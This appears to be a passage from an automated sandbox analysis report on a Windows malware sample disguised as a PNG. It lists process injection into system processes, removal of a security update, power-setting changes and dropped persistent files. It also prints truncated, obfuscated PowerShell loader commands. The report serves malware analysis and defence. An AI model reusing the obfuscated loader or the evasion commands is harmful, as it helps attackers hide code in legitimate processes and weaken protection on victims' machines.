            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2970000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2300000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 840000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2090000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2200000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F0A6440000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1BFF06F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 24089940000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 28B955D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 14ECB470000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 191C8F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 27F4ECC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 17B55CA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9700000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 278C9730000
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{cf3d95db-0758-4a82-bfdc-72f769e75e83}Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{0efb55d5-e8e1-4bc9-b3c4-28c83a2f4e5a}
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:cktjhrwjgtvv{param([outputtype([type])][parameter(position=0)][type[]]$oberloaczjvocu,[parameter(position=1)][type]$nrddeuxitk)$iahamhduysn=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+''+'l'+''+'e'+''+'c'+'t'+'e'+''+[char](100)+''+[char](68)+''+'e'+'l'+[char](101)+''+[char](103)+'a'+[char](116)+''+'e'+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+'mor'+[char](121)+''+[char](77)+''+'o'+'dul'+'e'+'',$false).definetype(''+[char](77)+''+'y'+'de'+[char](108)+''+'e'+''+[char](103)+''+[char](97)+'t'+'e'+''+[char](84)+''+'y'+'p'+'e'+'',''+[char](67)+''+[char](108)+'as'+[char](115)+''+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+''+'l'+''+'i'+'c,'+[char](83)+'e'+'a'+''+[char](108)+''+'e'+''+[char](100)+''+[char](44)+''+[char](65)+'nsic'+[char](108)+'a'+[char](115)+''+[char](115)+''+','+''+'a'+''+[char](117)+''+'t'+''+[char](111)+'cla'+'s'+''+'s'+'',[multicastdelegate]);$iahamhduysn.defineconstructor(''+'r'+''+'t'+''+[char](83)+''+'p'+''+[char](101)+'c'+[char](105)+'a'+[char](108)+''+[char](78)+'a'+[char](109)+''+[char](101)+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+''+[char](101)+''+'b'+''+[char](121)+''+[char](83)+''+[char](105)+'g'+[char](44)+'p'+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$oberloaczjvocu).setimplementationflags(''+'r'+'u'+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+[char](110)+''+[char](97)+'ged');$iahamhduysn.definemethod('i'+[char](110)+'v'+'o'+''+[char](107)+'e',''+[char](80)+'ub'+'l'+''+[char](105)+''+[char](99)+''+[char](44)+''+[char](72)+''+'i'+''+'d'+''+'e'+''+[char](66)+''+'y'+''+'s'+''+[char](105)+''+[char](103)+''+[char](44)+''+[char](78)+''+[char](101)+''+'w'+''+[char](83)+''+'l'+''+[char](111)+'t'+[char](44)+''+[char](86)+''+[char](105)+'r'+[char](116)+'u'+'a'+''+[char](108)+'',$nrddeuxitk,$oberloaczjvocu).setimplementationflags('ru'+[char](110)+''+[char](116)+''+[char](105)+''+'m'+'e'+','+''+[char](77)+'anag'+'e'+''+'d'+'');write-output $iahamhduysn.createtype();}$qragmiyqxnsdw=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals('s'+'y'+''+'s'+'te'+[char](109)+''+[char](46)+''+[char](100)+''+[char](108)+''+[char](108)+'')}).gettype(''+'m'+''+[char](105)+''+[char](99)+''+[char](114)+'os'+[char](111)+'f'+'t'+''+[char](46)+''+[char](87)+''+'i'+'n3'+[char](50)+''+[char](46)+''+[char](85)+''+'n'+'s'+[char](97)+'f'+[char](101)+''+[char](78)+'a'+[char](116)+''+[char](105)+''+[char](118)+''+[char](101)+''+'m'+'e'+[char](116)+'ho'+[char](100)+''+'s'+'');$ovdfgatjnennnn=$qragmiyqxnsdw.getmethod(''+'g'+''+[char](101)+'t'+'p'+''+[char](114)+''+[char](111)+'c'+[char](65)+
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:dwpcgqraxeqb{param([outputtype([type])][parameter(position=0)][type[]]$kwrqxtwrdzvghi,[parameter(position=1)][type]$douozqbwki)$zycfoocruuh=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname('r'+[char](101)+''+[char](102)+''+'l'+''+[char](101)+''+[char](99)+''+[char](116)+''+[char](101)+'d'+'d'+''+[char](101)+'l'+[char](101)+''+'g'+''+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+[char](73)+''+[char](110)+'m'+[char](101)+''+[char](109)+'o'+[char](114)+'y'+'m'+'o'+[char](100)+'u'+[char](108)+''+[char](101)+'',$false).definetype(''+[char](77)+''+[char](121)+''+[char](68)+'e'+[char](108)+''+'e'+'ga'+[char](116)+''+[char](101)+'t'+[char](121)+''+[char](112)+''+[char](101)+'',''+[char](67)+''+[char](108)+'a'+'s'+''+[char](115)+''+[char](44)+''+[char](80)+''+'u'+'b'+[char](108)+''+[char](105)+''+'c'+''+[char](44)+''+'s'+''+[char](101)+''+'a'+''+'l'+''+[char](101)+''+[char](100)+''+','+''+[char](65)+''+[char](110)+''+'s'+''+'i'+''+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+[char](65)+''+[char](117)+''+[char](116)+''+'o'+''+[char](67)+'lass',[multicastdelegate]);$zycfoocruuh.defineconstructor(''+[char](82)+'t'+[char](83)+''+'p'+'e'+'c'+''+[char](105)+''+[char](97)+''+'l'+''+'n'+''+[char](97)+''+[char](109)+''+[char](101)+','+[char](72)+''+'i'+'d'+[char](101)+'b'+[char](121)+''+'s'+''+[char](105)+''+[char](103)+','+[char](80)+'u'+'b'+'l'+[char](105)+''+[char](99)+'',[reflection.callingconventions]::standard,$kwrqxtwrdzvghi).setimplementationflags(''+'r'+''+'u'+'nt'+'i'+'m'+[char](101)+','+'m'+''+'a'+''+[char](110)+''+[char](97)+'g'+'e'+''+[char](100)+'');$zycfoocruuh.definemethod(''+[char](73)+'n'+[char](118)+''+'o'+''+'k'+''+'e'+'',''+[char](80)+''+[char](117)+''+'b'+''+[char](108)+''+[char](105)+'c'+[char](44)+'h'+[char](105)+''+[char](100)+''+[char](101)+''+'b'+''+[char](121)+'sig'+','+''+[char](78)+''+'e'+''+[char](119)+''+'s'+''+[char](108)+''+[char](111)+''+[char](116)+''+[char](44)+''+[char](86)+'ir'+[char](116)+''+'u'+''+'a'+''+[char](108)+'',$douozqbwki,$kwrqxtwrdzvghi).setimplementationflags(''+'r'+''+'u'+''+'n'+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+[char](77)+''+[char](97)+'n'+'a'+''+[char](103)+''+'e'+''+[char](100)+'');write-output $zycfoocruuh.createtype();}$pibnzpatgoisb=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+'t'+''+'e'+''+[char](109)+''+[char](46)+'d'+'l'+'l')}).gettype(''+[char](77)+'i'+[char](99)+''+[char](114)+'o'+'s'+''+'o'+''+[char](102)+''+[char](116)+'.'+[char](87)+'in'+[char](51)+''+[char](50)+''+'.'+'uns'+[char](97)+''+[char](102)+'e'+'n'+''+[char](97)+'t'+'i'+''+[char](118)+'em'+[char](101)+''+[char]
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,68_2_0000000140002300
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,68_2_0000000140002300
            Source: C:\Windows\System32\conhost.exeCode function: 31_3_0000024089953B20 cpuid 31_3_0000024089953B20
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\dllhost.exeCode function: 68_2_0000000140002300 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,68_2_0000000140002300
            Source: C:\Windows\System32\conhost.exeCode function: 31_2_000002408A297D90 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,31_2_000002408A297D90
            Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Modifies power options to not sleep / hibernate
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\Users\user\Desktop\0Ty.png.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
            Source: C:\ProgramData\fimdesrsuelr\weiuemyrzjra.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
            Source: dllhost.exeBinary or memory string: MsMpEng.exe

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
